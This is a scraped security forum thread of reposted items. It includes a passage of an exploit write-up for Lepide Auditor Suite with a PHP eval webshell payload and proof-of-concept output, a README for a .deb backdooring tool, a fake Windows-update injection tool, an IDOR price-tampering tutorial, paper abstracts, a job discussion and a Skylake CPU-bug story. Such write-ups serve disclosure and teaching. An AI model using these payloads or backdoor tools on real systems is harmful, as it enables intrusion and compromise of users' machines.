if(!socket_connect($sock , $ip ,$port)) { $sock= ""; $error="could not connect"; return $sock; } else{ return $sock; } return $sock; } The code creates a raw socket connection to the supplied server parameter. Switching back to the index.php script, on lines 37 and 39 the code tries to authenticate using the supplied username and password. If successful from line 43, a valid, authenticated session is created! Since, as an attacker, we can control the authenticating server parameter, we can essentially bypass the authentication. Gaining Remote Code Execution Now that we could bypass the authentication, we decided to look further into the source code and see what other input is trusted from the authentication server. After spending some more time browsing around the source code, we noticed an interesting file named genratereports.php. Judging by the name, it is presumably used to generate rate reports, rather than facilitating an attacker’s access into the target. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 $gid= isset($_GET["grid_id"])?$_GET["grid_id"]:''; if(($id!=0)&&($daterange!="")&&($path!="")&&($gid=="")) { $port=1056; $sock =login($ip, $port, $username,$password); if($sock) { $data = 604; if(sendtags($sock,$data)) { if(sendstringtoserver($sock,$id)) { if(sendstringtoserver($sock,$path)) { $columnamestr=getstringfromserver($sock); $columname=genratecolumnname($columnamestr); session_start(); $_SESSION["columname"]=$columname; session_write_close(); } } } if($columname) { $data = 603; if(sendtags($sock,$data)) { if(sendstringtoserver($sock,$daterange)) { if(sendstringtoserver($sock,$id)) { if(sendstringtoserver($sock,$path)) { $filename=getfilefromremote($sock); if($filename) { $restore_file = "temp/".$filename.".sql"; if(createdb($restore_file,$username,$sessionnumber)) It seems that we can reach the vulnerable code block if the $gid variable is set, which is controlled from the grid_id GET parameter. Next, login() is called using our supplied username and password from our authenticated session. The login() function is essentially the same process we went through before to authenticate and setup the initial session, defined in config.php. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 function login($ip, $port, $username,$password) { $sock=connect ($ip,$port); if($sock) { $data= 601; //authenticate login if(sendtags($sock,$data)) { if(sendstringtoserver($sock,$username)) { if(sendstringtoserver($sock,$password)) { $recv= getstringfromserver($sock); if ($recv =='_SUCCESS_') { return $sock; /* $_SESSION["username"]=$username; $_SESSION["ip"]=$servername; header("location: data.php" ); exit(); */ } else{ disconnect($sock); destroysession(); //return false; } } } } } } The difference this time, is that it doesn’t set any session variables, but simply returns the socket handle. Returning back to genratereports.php, after the login returns and validates the socket handle, some tags and strings are sent to the controlled server and then a column name is sent from the server. That column name is validated, and then finally, on line 34, we see a call to getfilefromremote(). That function looked scary interesting to us, so we decided it merited further investigation. The getfilefromremote() function is also defined in config.php: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 function getfilefromremote($sock) { $uniqid=uniqid(); $tag=readtag($sock); if($tag[1]==5) { $msg=""; $buf=socket_read ($sock, 4); $rec_Data= unpack("N",$buf); if($rec_Data[1]>0)//size { if($rec_Data[1]0) { $data= socket_read($sock, $size); $size=$size-strlen($data); $data_rec.=$data; } } catch (Exception $e) { echo 'Caught exception: ', $e->getMessage(), "\n"; } $data = iconv('UTF-16LE','UTF-8',$data_rec); $fp = fopen("temp/".$uniqid.".sql","wb"); fwrite($fp,$data); fclose($fp); $ack=2; if(socket_send ( $sock , pack('N*',$ack), strlen(pack('N*',$ack)) , 0)) { if($rec_ack=readtag($sock)) { if($rec_ack[1]==2) { //socket_close($sock); return $uniqid; } } } } The function reads data from our controlled server and copies it to a temporary file that is created using uniqid() on lines 22 and 23. Finally, the code returns the uniqid that was created. Going back to genratereports.php, we can see the $restore_file variable is mapped to the same path as the file that was created in getfilefromremote(). That variable is then passed to the createdb() function. Let’s investigate createdb() within, once again, config.php: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 function createdb($dbfile,$Dusername,$sessionnumber) { $dbcreate= false; ini_set('max_execution_time', 300); //300 seconds = 5 minutes $server_name= "localhost"; $username= "root"; $password= ""; $dbname= substr(preg_replace("/[^a-z]+/", "", $Dusername), 0, 12); $dbname= $dbname.$sessionnumber; $link = mysql_connect($server_name, $username, $password); if ($link) { $user=substr(preg_replace("/[^a-z]+/", "", $Dusername), 0, 12); //$user=$user.sessionno $host="localhost"; $pass= "123456"; $userQ= "DROP USER ".$user."@localhost"; $createQ = "CREATE USER '{$user}'@'{$host}' IDENTIFIED BY '{$pass}'"; $grantQ = "GRANT ALTER, ALTER ROUTINE, CREATE, CREATE ROUTINE, CREATE TEMPORARY TABLES, CREATE USER, CREATE VIEW, DELETE, DROP, EVENT, EXECUTE, FILE, INDEX, INSERT, LOCK TABLES, PROCESS, REFERENCES, RELOAD, REPLICATION CLIENT, REPLICATION SLAVE, SELECT, SHOW DATABASES, SHOW VIEW, SHUTDOWN, SUPER, TRIGGER, UPDATE ON *.* TO '{$user}'@'{$host}' WITH GRANT OPTION"; mysql_query($userQ); if(mysql_query($createQ)){ if(mysql_query($grantQ)){ $dropdbQ ='DROP DATABASE IF EXISTS '.$dbname; mysql_query($dropdbQ, $link); $sql = 'CREATE DATABASE IF NOT EXISTS '.$dbname; mysql_query($sql, $link); $cmd = "mysql -h {$host} -u {$user} -p{$pass} {$dbname} < $dbfile"; exec($cmd,$output,$return); The createdb function attempts to create a new root database user account and uses the supplied $restore_file variable into a command that is passed to exec() on lines 30 and 31. On the surface, it appears that this is a command execution vulnerability, however, since we do not fully or partially control the filename directly (just the contents), we cannot execute commands. However, the astute reader has probably put it all together–we can control input passed to the MySQL client as the database user root using attacker-controlled SQL. At this point, we can do something like the following: 1 2 # exploit! if send_file(conn, "select '<?php eval($_GET[e]); ?>' into outfile '../../www/offsec.php';"): Exploitation This was simple enough. All we had to do was create a socket server that interacted with the target and supplied what it needed, when it needed it. In one window, we setup the malicious server: root@kali:~# ./server-poc.py Lepide Auditor Suite createdb() Web Console Database Injection Remote Code Execution by mr_me 2016 (+) waiting for the target... We then used a client to send the first login request, then a second request to the getratereport.php file: root@kali:~# ./client-poc.py 172.16.175.137 172.16.175.1 (+) sending auth bypass (+) sending code execution request The first request just performs the login against our attacker-controlled server: POST /index.php HTTP/1.1 Host: 172.16.175.137:7778 Content-Type: application/x-www-form-urlencoded Content-Length: 61 servername=172.16.175.1&username=test&password=hacked&submit= We get a response that contains an authenticated PHPSESSID. We must take care to not follow the redirect, or our PHPSESSID will be destroyed (code omitted): HTTP/1.1 302 Found Date: Sun, 22 May 2016 19:00:20 GMT Server: Apache/2.4.12 (Win32) PHP/5.4.10 X-Powered-By: PHP/5.4.10 Set-Cookie: PHPSESSID=lkhf0n8epc481oeq4saaesgqe3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache location: reports Content-Length: 8 Content-Type: text/html The second request triggers the exec() call using our newly-authenticated PHPSESSID: GET /genratereports.php?path=lol&daterange=1@9&id=6 HTTP/1.1 Host: 172.16.175.137:7778 Cookie: PHPSESSID=lkhf0n8epc481oeq4saaesgqe3 Finally, all the pieces come together… root@kali:~# ./server-poc.py Lepide Auditor Suite createdb() Web Console Database Injection Remote Code Execution by mr_me 2016 (+) waiting for the target... (+) connected by ('172.16.175.137', 50541) (+) got a login request (+) got a username: test (+) got a password: hacked (+) sending SUCCESS packet (+) send string successful (+) connected by ('172.16.175.137', 50542) (+) got a login request (+) got a username: test (+) got a password: hacked (+) sending SUCCESS packet (+) send string successful (+) got a column request (+) got http request id: 6 (+) got http request path: lol (+) send string successful (+) got a filename request (+) got http request daterange: 1@9 - 23:59:59 (+) got http request id: 6 (+) got http request path: lol (+) successfully sent tag (+) successfully sent file! (+) file sent successfully (+) done: http://172.16.175.137:7778/offsec.php?e=phpinfo(); That’s unauthenticated remote code execution as NT AUTHORITY/SYSTEM. It’s also interesting to note that Lepide uses an old version of PHP! Conclusion Currently, a great deal of focus is applied to input validation vulnerabilities such as an SQL injection or PHP code injection but the complete security model of this application is destroyed when trusting the client to supply the authentication server. Disastrous logic vulnerabilities such as these can be avoided if the trust chain is validated before deployment. This is a vulnerability that would have never been found via the blackbox approach. Last year during our Advanced Web Attacks and Exploitation (AWAE) course at Black Hat, we guided the students focus away from the ‘traditional’ black-box web application penetration test to a more involved white-box / grey-box research approach. The threat landscape is changing and skilled web application bug hunters are everywhere due to the explosion of the service-oriented bug bounties provided by companies large and small. On the other hand, product-oriented bug bounties require auditors to understand application logic and code even more so than a service-oriented bounty hunter. In order for security analysts to progress, they will need to have the ability to audit source code at a detailed level in the on-going quest to discover zero-day. References: http://www.zerodayinitiative.com/advisories/ZDI-17-440/ Sursa: https://www.offensive-security.com/vulndev/auditing-the-auditor/
      • 1
      • Upvote
  11. [DEBINJECT] Copyright 2017 Debinject Written by: Alisson Moretto - 4w4k3 - UndeadSec TOOL DESIGNED TO GOOD PURPOSES, PENTESTS, DON'T BE A CRIMINAL ! Only download it here, do not trust in other places. CLONE git clone https://github.com/UndeadSec/Debinject.git RUNNING cd Debinject python debinject.py If you have another version of Python: python2.7 debinject.py RUN ON TARGET SIDE chmod 755 default.deb dpkg -i backdoored.deb DISCLAIMER "DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE." Taken from LICENSE. PREREQUISITES dpkg dpkg-deb metasploit TESTED ON Kali Linux - SANA Kali Linux - ROLLING SCREENSHOT More in Screens CONTRIBUTE Send me more features if you want it I need your Help to become it to better. LICENSE: This project is licensed under the BSD-3-Clause - see the LICENSE file for details. Sursa: https://github.com/UndeadSec/Debinject
  12. filewatcher a simple auditing utility for macOS Filewatcher is an auditing and monitoring utility for macOS. It can audit all events from the system auditpipe of macOS and filter them by process or by file You can use this utility to: Monitor access to a file, or a group of files. Monitor activity of a process, and which resources are accessed by that process. Build a small Host-Based IDS by monitoring access or modifications to specific files. Do an dynamic malware analysis by monitoring what the malware is using on the filesystem. If you want to read more about how it works, check my blog. Installation Just run make to compile it and then ./bin/filewatcher. Usage: ./bin/filewatcher [OPTIONS] -f, --file Set a file to filter -p, --process Set a process name to filter -a, --all Display all events (By default only basic events like open/read/write are displayed) -d, --debug Enable debugging messages to be saved into a file -h, --help Print this help and exit Expected output: Sursa: https://github.com/m3liot/filewatcher
  13. Abstract—We present the password reset MitM (PRMitM) attack and show how it can be used to take over user accounts. The PRMitM attack exploits the similarity of the registration and password reset processes to launch a man in the middle (MitM) attack at the application level. The attacker initiates a password reset process with a website and forwards every challenge to the victim who either wishes to register in the attacking site or to access a particular resource on it. The attack has several variants, including exploitation of a password reset process that relies on the victim’s mobile phone, using either SMS or phone call. We evaluated the PRMitM attacks on Google and Facebook users in several experiments, and found that their password reset process is vulnerable to the PRMitM attack. Other websites and some popular mobile applications are vulnerable as well. Although solutions seem trivial in some cases, our experiments show that the straightforward solutions are not as effective as expected. We designed and evaluated two secure password reset processes and evaluated them on users of Google and Facebook. Our results indicate a significant improvement in the security. Since millions of accounts are currently vulnerable to the PRMitM attack, we also present a list of recommendations for implementing and auditing the password reset process. Download: https://www.ieee-security.org/TC/SP2017/papers/207.pdf
      • 2
      • Upvote
  14. Resources KeenLab's MOSEC 2017 iOS 10 Kernel Security Presentation is Now UP! OASP Pangu 9 Internals Hacking from iOS 8 to iOS 9 Analysis of iOS 9.3.3 Jailbreak & Security Enhancements of iOS 10 iOS内核漏洞挖掘-Fuzz & 代码审计 The Userland Exploits of Pangu 8——cansecwest Improving Mac OS X Security Through Gray Box Fuzzing Technique OS X Kernel is As Strong as its Weakest Part Optimized Fuzzing IOKit in iOS Pangu 9.3 (女娲石) Don't TrustYour Eye:Apple Graphics Is Compromised!——cansecwest Liang Chen Hack in the (sand)Box——Jonathan Levin Video PDF The ARMs race to TrustZone——Jonathan Levin Video PDF iOS 10 - Kernel Heap Revisited——Stefan Esser Video PDF iOS Kernel Exploitation——Stefan Esser Video PDF Link: https://github.com/aozhimin/MOSEC-2017
      • 2
      • Upvote
  15. Beginner Guide to Insecure Direct Object References (IDOR) posted inPenetration Testing, Website Hacking on July 4, 2017 by Raj Chandel Insecure Direct Object References (IDOR) has been placed fourth on the list of OWASP Top 10 Web application security risks since 2013. It allows an authorized user to obtain the information of other users, and could be establish in any type of web applications. Basically it allows requests to be made to specific objects through pages or services without the proper verification of requester’s right to the content. OWASP definition: Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object. Such resources can be database entries belonging to other users, files in the system, and more. This is caused by the fact that the application takes user supplied input and uses it to retrieve an object without performing sufficient authorization checks. The Application uses untested data in a SQL call that is accessing account information. Let consider a scenario where a web application allow the login user to change his secret value. Here you can see the secret value must be referring to some user account of the database. Currently user bee is login into web server for changing his secret value but he is willing to perform some mischievous action that will change the secret value for other user. Using burp suite we had captured the request of browser where you can see in the given image login user is bee and secret value is hello; now manipulate the user from another user. SQLquery = “SELECT * FROM useraccounts WHERE account = ‘bee’; Now let’s change user name into raj as shown in given image. To perform this attack in an application it requires atleast two user accounts. SQLquery = “SELECT * FROM useraccounts WHERE account = ‘raj’; Great!!! We have successfully changed the secret value for raj. Note: in any official website the attacker will replace user account from admin account. Let take another scenario that look quite familiar for most of IDOR attack. Many times we book different order online through their web application for example bookmyshow.com for movie ticket booking. Let consider same scenario in bwapp for movie ticket booking, where I had book 10 tickets of 15 EUR for each. Now let’s confirm it and capture the browser request through burp suite. Now you can see we have intercepted request where highlighted text contains number of tickets and price of one ticket i.e 15 EUR it means it will reduce 150 EUR from my (user) account; now manipulate this price from your desire price. I had changed it into 1 EUR which means now it will reduce only 10 EUR from account, you can observe it from given image then forward the request. Awesome!!! We had booked the 10 tickets in 10 EUR only. Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here Sursa: http://www.hackingarticles.in/beginner-guide-insecure-direct-object-references/
      • 2
      • Upvote
  16. ARM Exploitation: Return Oriented Programming on ARM Slides: https://docs.google.com/viewer?url=dl.dropbox.com%2Fu%2F2595211%2FROP_ARMEXP.pdf
      • 2
      • Upvote
  17. Publicat pe 5 iul. 2017 Live workshop walkthrough for the TI addr_limit bug Using syscalls in the kernel (or simply forgetting to reset the addr_limit value before returning to user space) may lead to this type of bugs. We're using a stack info leak with the buggy get_fs/set_fs code to overwrite the (e)uid and (e)gid of the current process to elevate privileges.
      • 2
      • Upvote
  18. @tjt " De ce sa nu iti dea ? " - Tu daca ai avea firma ta i-ai da unuia care nu a muncit o zi pe ceea ce ai nevoie 5000 RON? Desi omul poate a mai citit cate ceva, daca nu a lucrat macar 1-2 ani cu ceea ce se cere, nu o sa se compare cu unul care a lucrat. De exemplu, cand m-am angajat ca C++ developer acum 6 ani, stiam limbajul extrem de bine. Dar ca sa vezi, nu prea era deajuns. Nu lucrasem cu sockets, multi-threading, STL, semaphores si mai stiu eu ce, pe cand cineva cu experienta probabil se lovise de cel putin o parte dintre ele. Nu cred ca cineva care nu a lucrat la o companie pe ceva anume, indiferent de ce, a petrecut aproape zilnic cateva ore sa isi dezvolte cunostiintele. Un alt exemplu, e ca inainte sa ma angajez prima oara am vrut sa lucrez ca PHP developer. Scrisesem peste 20.000 de linii de cod, aveam ceva proiecte DAR: nu scrisesem cod MVC (evident), nu lucrasem cu OOP (proiecte mici, evident), nu lucrasem cu niciun framework (la fel). Asadar, de ce sa imi dea 5000 RON pe luna cand eu ar trebui sa stau luni de zile sa invat cum trebuie lucrurile astea? " cineva care a investit timpul personal chiar si bani ca sa isi imbunatateasca cunostinte, sa obtina certificari " - Nu a investit nimeni destul din timpul personal pentru a fi la fel de bun ca cineva care a facut acel lucru 8 ore pe zi timp de 1-2 ani. Si nici nu o sa o faca nimeni. Ca mai citesti zilnic cate un articol, ca din cand in cand citesti o carte, e OK, dar nu e de ajuns. Da, dovedeste entuziasm si conteaza mult, dar nu e de ajuns. Pune-te in locul angajatorului. Cat despre HR, sau "Professional Linkedin browser", din pacate, nu au capacitatea de a trece peste anumite lucruri si de a intelege anumite lucruri. Intotdeauna o sa te lovesti de probleme cu ei si poti pierde locuri de munca bune din cauza ca ei vor considera poate ca "nu are facultate de IT, nu poate sa lucreze pe security", pentru ca ei nu inteleg ca nu exista facultate pentru asa ceva de exemplu. @Philip.J.Fry Nu stiu daca RON sau EUR, nu cred ca EUR in Romania. Da, diploma nu ar trebui sa conteze, ca nu stiu pe nimeni sa fi terminat Facultatea de Reverse Engineering si Analiza Malware in Romania, insa fara experienta mi se pare greu de crezut. Adica serios, ai da cuiva 3.7 EUR pe luna in Romania cuiva care probabil are ceva cunostiinte tehnice dobandite in timpul liber, in locul unuia care a facut asta luni de zile la cine stie ce companie care face antivirus? @gigiRoman Acum vreo 4 ani cred, am avut si eu interviu la Avira pe C++ Developer. Am avut de facut o aplicatie client-server, multithreading si cu nu stiu mai ce functionalitati in 3 ore. Am facut-o si a mers foarte bine, si ziceau cei de acolo ca majoritatea nu o fac in cele 3 ore. Apoi am avut o discutie tehnica. Toate bune si frumoase, pana sa vorbim despre antivirus. Le-am zis ca am facut un crypter, un program care ia un fisier detectabil si il face nedetectabil. Au zis ca "nu se poate, antivirusul nostru il prinde". Le-am explicat cum functioneaza si de ce nu l-ar prinde, ca se incarca in memorie bla-bla, dar nu au parut sa inteleaga. Apoi m-au intrebat: "De ce te-am angaja, de unde stim ca avand acces la codul sursa al antivirusului, nu ai dezvolta in continuare astfel de lucruri?". Am inceput sa rad si le-am zis ca nu am nevoie de codul sursa sa fac asa ceva. Nu m-au mai contactat deloc. Asadar, ca idee generala, de care m-am lovit si eu acum vreo 6 ani cand m-am angajat pe 1600 RON: NU va asteptati sa sara cu banii pe voi, pentru ca nu au de ce. In plus, nu sunteti singurele persoane care isi cauta un loc de munca in IT. Desi sunt destule job-uri, pentru pozitiile de inceput sunt foarte multi care aplica. De asemenea, banuiesc ca daca cineva lucreaza la un proiect in timpul personal, sau face ceva ca sa invete, poate mai posteaza si pe aici. Nu am vazut de ani de zile astfel de lucruri postate. Am fost si eu tanar student, si ce crezi, preferam sa stau sa scriu cod, sau sa beau pana picam din picioare?
  19. Daca nu ai experienta de munca sau cel putin proiecte personale, orice, nu iti da nimeni 5000 RON. Dar de crescut poate sa creasca destul de mult.
  20. WSUXploit Written by Marcio Almeida to weaponize the use of WSUSpect Proxy created by Paul Stone and Alex Chapman in 2015 and public released by Context Information Security Summary This is a MiTM weaponized exploit script to inject 'fake' updates into non-SSL WSUS traffic. It is based on the WSUSpect Proxy application that was introduced to public on the Black Hat USA 2015 presentation, 'WSUSpect – Compromising the Windows Enterprise via Windows Update' Please read the White Paper and the presentation slides listed below: White paper: http://www.contextis.com/documents/161/CTX_WSUSpect_White_Paper.pdf Slides: http://www.contextis.com/documents/162/WSUSpect_Presentation.pdf Sursa: https://github.com/pimps/wsuxploit
      • 1
      • Upvote
  21. How I found a bug in Intel Skylake processors July 3, 2017 By Xavier Leroy Instructors of "Introduction to programming" courses know that students are willing to blame the failures of their programs on anything. Sorting routine discards half of the data? "That might be a Windows virus!" Binary search always fails? "The Java compiler is acting funny today!" More experienced programmers know very well that the bug is generally in their code: occasionally in third-party libraries; very rarely in system libraries; exceedingly rarely in the compiler; and never in the processor. That's what I thought too, until recently. Here is how I ran into a bug in Intel Skylake processors while trying to debug mysterious OCaml failures. The first sighting Late April 2016, shortly after OCaml 4.03.0 was released, a Serious Industrial OCaml User (SIOU) contacted me privately with bad news: one of their applications, written in OCaml and compiled with OCaml 4.03.0, was crashing randomly. Not at every run, but once in a while it would segfault, at different places within the code. Moreover, the crashes were only observed on their most recent computers, those running Intel Skylake processors. (Skylake is the nickname for what was the latest generation of Intel processors at the time. The latest generation at the time of this writing is nicknamed Kaby Lake.) Many OCaml bugs have been reported to me in the last 25 years, but this report was particularly troubling. Why Skylake processors only? Indeed, I couldn't reproduce the crashes using SIOU's binary on my computers at Inria, which were all running older Intel processors. Why the lack of reproducibility? SIOU's application was single-threaded and made no network I/O, only file I/O, so its execution should have been perfectly deterministic, and whatever bug caused the segfault should cause it at every run and at the same place in the code. My first guess was flaky hardware at SIOU: a bad memory chip? overheating? Speaking from personal experience, those things happen and can result in a computer that boots and runs a GUI just fine, then crashes under load. So, I suggested SIOU to run a memory test, underclock their processor, and disable hyperthreading (HT) while they were at it. The HT suggestion was inspired by an earlier report of a Skylake bug involving AVX vector arithmetic, which would show up only with HT enabled (see description). SIOU didn't take my suggestions well, arguing (correctly) that they were running other CPU- and memory-intensive tests on their Skylake machines and only the ones written in OCaml would crash. Clearly, they thought their hardware was perfect and the bug was in my software. Great. I still managed to cajole them into running a memory test, which came back clean, but my suggestion about turning HT off was ignored. (Too bad, because this would have saved us much time.) In parallel, SIOU was conducting an impressive investigation, varying the version of OCaml, the C compiler used to compile OCaml's runtime system, and the operating system. The verdict came as follows. OCaml: 4.03, including early betas, but not 4.02.3. C compiler: GCC, but not Clang. OS: Linux and Windows, but not MacOS. Since MacOS uses Clang and they used a GCC-based Windows port, the finger was being firmly pointed to OCaml 4.03 and GCC. Surely, SIOU reasoned, in the OCaml 4.03 runtime system, there is a piece of bad C code -- an undefined behavior as we say in the business -- causing GCC to generate machine code that crashes, as C compilers are allowed to do in the presence of undefined behaviors. That would not be the first time that GCC treats undefined behaviors in the least possibly helpful way, see for instance this security hole and this broken benchmark. The explanation above was plausible but still failed to account for the random nature of crashes. When GCC generates bizarre code based on an undefined behavior, it still generates deterministic code. The only source of randomness I could think of is Address Space Layout Randomization (ASLR), an OS feature that causes absolute memory addresses to change from run to run. The OCaml runtime system uses absolute addresses in some places, e.g. to index into a hash table of memory pages. However, the crashes remained random after turning ASLR off, in particular when running under the GDB debugger. We were now in early May 2016, and it was my turn to get my hands dirty, as SIOU subtly hinted by giving me a shell account on their famous Skylake machine. My first attempt was to build a debug version of OCaml 4.03 (to which I planned to add even more debugging instrumentation later) and rebuild SIOU's application with this version of OCaml. Unfortunately this debug version would not trigger the crash. Instead, I worked from the executable provided by SIOU, first interactively under GDB (but it nearly drove me crazy, as I had to wait sometimes one hour to trigger the crash again), then using a little OCaml script that ran the program 1000 times and saved the core dumps produced at every crash. Debugging the OCaml runtime system is no fun, but post-mortem debugging from core dumps is atrocious. Analysis of 30 core dumps showed the segfaults to occur in 7 different places, two within the OCaml GC and 5 within the application. The most popular place, with 50% of the crashes, was the mark_slice function from OCaml's GC. In all cases, the OCaml heap was corrupted: a well-formed data structure contains a bad pointer, i.e. a pointer that doesn't point to the first field of a Caml block but instead points to the header or inside the middle of a Caml block, or even to invalid memory (already freed). The 15 crashes in mark_slice were all caused by a pointer two words ahead in a block of size 4. All those symptoms were consistent with familiar mistakes such as the ocamlopt compiler forgetting to register a memory root with the GC. However, those mistakes would cause reproducible crashes, depending only on the allocation and GC patterns. I completely failed to see what kind of memory management bug in OCaml could cause random crashes! By lack of a better idea, I then listened again to the voice at the back of my head that was whispering "hardware bug!". I had a vague impression that the crashes happened more frequently the more the machine was loaded, as would be the case if it were just an overheating issue. To test this theory, I modified my OCaml script to run N copies of SIOU's program in parallel. For some runs I also disabled the OCaml memory compactor, resulting in a bigger memory footprint and more GC activity. The results were not what I expected but striking nonetheless: N system load w/default options w/compactor turned off 1 3+epsilon 0 failures 0 failures 2 4+epsilon 1 failure 3 failures 4 6+epsilon 12 failures 19 failures 8 10+epsilon 17 failures 23 failures 16 18+epsilon 16 failures The number of failures given above is for 1000 runs of the test program. Notice the jump between N = 2 and N = 4 ? And the plateau for higher values of N ? To explain those numbers, I need to give more information on the test Skylake machine. It has 4 physical cores and 8 logical cores, since HT is enabled. Two of the cores were busy with two long-running tests (not mine) in the background, but otherwise the machine was not doing much, hence the system load was 2 + N + epsilon, where N is the number of tests I ran in parallel. When there are no more than 4 active processes at the same time, the OS scheduler spreads them evenly between the 4 physical cores of the machine, and tries hard not to schedule two processes on the two logical cores of the same physical core, because that would result in underutilization of the resources of the other physical cores. This is the case here for N = 1 and also, most of the time, for N = 2. When the number of active processes grows above 4, the OS starts taking advantage of HT by scheduling processes to the two logical cores of the same physical core. This is the case for N = 4 here. It's only when all 8 logical cores of the machine are busy that the OS performs traditional time-sharing between processes. This is the case for N = 8 and N = 16 in our experiment. It was now evident that the crashes happened only when hyperthreading kicked in, or more precisely when the OCaml program was running along another hyperthread (logical core) on the same physical core of the processor. I wrote SIOU back with a summary of my findings, imploring them to entertain my theory that it all has to do with hyperthreading. This time they listened and turned hyperthreading off on their machine. Then, the crashes were gone for good: two days of testing in a loop showed no issues whatsoever. Problem solved? Yes! Happy ending? Not yet. Neither I nor SIOU tried to report this issue to Intel or others: SIOU because they were satisfied with the workaround consisting in compiling OCaml with Clang, and because they did not want any publicity of the "SIOU's products crash randomly!" kind; I because I was tired of this problem, didn't know how to report those things (Intel doesn't have a public issue tracker like the rest of us), and suspected it was a problem with the specific machines at SIOU (e.g. a batch of flaky chips that got put in the wrong speed bin by accident). The second sighting The year 2016 went by without anyone else reporting that the sky (or more exactly the Skylake) was falling with OCaml 4.03, so I gladly forgot about this little episode at SIOU (and went on making horrible puns). Then, on January 6th 2017, Enguerrand Decorne and Joris Giovannangeli at Ahrefs (another Serious Industrial OCaml User, member of the Caml Consortium to boot) report mysterious random crashes with OCaml 4.03.0: this is PR#7452 on the Caml bug tracker. In the repro case they provided, it's the ocamlopt.opt compiler itself that sometimes crashes or produces nonsensical output while compiling a large source file. This is not particularly surprising since ocamlopt.opt is itself an OCaml program compiled with the ocamlopt.byte compiler, but mades it easier to discuss and reproduce the issue. The public comments on PR#7452 show rather well what happened next, and the Ahrefs people wrote a detailed story of their bug hunt as a blog post. So, I'll only highlight the turning points of the story. Twelve hours after opening the PR, and already 19 comments into the discussion, Enguerrand Decorne reports that "every machine on which we were able to reproduce the issue was running a CPU of the Intel Skylake family". The day after, I mention the 2016 random crash at SIOU and suggest to disable hyperthreading. The day after, Joris Giovannangeli confirms that the crash cannot be reproduced when hyperthreading is disabled. In parallel, Joris discovers that the crash happens only if the OCaml runtime system is built with gcc -O2, but not with gcc -O1. In retrospect, this explains the absence of crashes with the debug OCaml runtime and with OCaml 4.02, as both are built with gcc -O1 by default. I go out on a limb and post the following comment: Is it crazy to imagine that gcc -O2 on the OCaml 4.03 runtime produces a specific instruction sequence that causes hardware issues in (some steppings of) Skylake processors with hyperthreading? Perhaps it is crazy. On the other hand, there was already one documented hardware issue with hyperthreading and Skylake (link) Mark Shinwell contacts some colleagues at Intel and manages to push a report through Intel customer support. Then, nothing happened for 5 months, until... The revelation On May 26th 2017, user "ygrek" posts a link to the following Changelog entry from the Debian "microcode" package: * New upstream microcode datafile 20170511 [...] * Likely fix nightmare-level Skylake erratum SKL150. Fortunately, either this erratum is very-low-hitting, or gcc/clang/icc/msvc won't usually issue the affected opcode pattern and it ends up being rare. SKL150 - Short loops using both the AH/BH/CH/DH registers and the corresponding wide register *may* result in unpredictable system behavior. Requires both logical processors of the same core (i.e. sibling hyperthreads) to be active to trigger, as well as a "complex set of micro-architectural conditions" SKL150 was documented by Intel in April 2017 and is described on page 65 of 6th Generation Intel® Processor Family - Specification Update. Similar errata go under the names SKW144, SKX150, SKZ7 for variants of the Skylake architecture, and KBL095, KBW095 for the newer Kaby Lake architecture. "Nightmare-level" is not part of the Intel description but sounds about right. Despite the rather vague description ("complex set of micro-architectural conditions", you don't say!), this erratum rings a bell: hyperthreading required? check! triggers pseudo-randomly? check! does not involve floating-point nor vector instructions? check! Plus, a microcode update that works around this erratum is available, nicely packaged by Debian, and ready to apply to our test machines. A few hours later, Joris Giovannangeli confirms that the crash is gone after upgrading the microcode. I run more tests on my shiny new Skylake-based workstation (courtesy of Inria's procurement) and come to the same conclusion, since a test that crashes in less than 10 minutes with the old microcode runs 2.5 days without problems with the updated microcode. Another reason to believe that SKL150 is the culprit is that the problematic code pattern outlined in this erratum is generated by GCC when compiling the OCaml run-time system. For example, in byterun/major_gc.c, function sweep_slice, we have C code like this: hd = Hd_hp (hp); /*...*/ Hd_hp (hp) = Whitehd_hd (hd); After macro-expansion, this becomes: hd = *hp; /*...*/ *hp = hd & ~0x300; Clang compile this code the obvious way, using only full-width registers: movq (%rbx), %rax [...] andq $-769, %rax # imm = 0xFFFFFFFFFFFFFCFF movq %rax, (%rbx) However, gcc prefers to use the %ah 8-bit register to operate upon bits 8 to 15 of the full register %rax, leaving the other bits unchanged: movq (%rdi), %rax [...] andb $252, %ah movq %rax, (%rdi) The two codes are functionally equivalent. One possible reason for GCC's choice of code is that it is more compact: the 8-bit constant $252 fits in 1 byte of code, while the 32-bit-extended-to-64-bit constant $-769 needs 4 bytes of code. At any rate, the code generated by GCC does use both %rax and %ah, and, depending on optimization level and bad luck, such code could end up in a loop small enough to trigger the SKL150 bug. So, in the end, it was a hardware bug. Told you so! Epilogue Intel released microcode updates for Skylake and Kaby Lake processors that fix or work around the issue. Debian has detailed instructions to check whether your Intel processor is affected and how to obtain and apply the microcode updates. The timing for the publication of the bug and the release of the microcode updates was just right, because several projects written in OCaml were starting to observe mysterious random crashes, for example Lwt, Coq, and Coccinelle. The hardware bug is making the rounds in the technical Web sites, see for example Ars Technica, HotHardware, Tom's Hardware, and Hacker's News. Sursa: 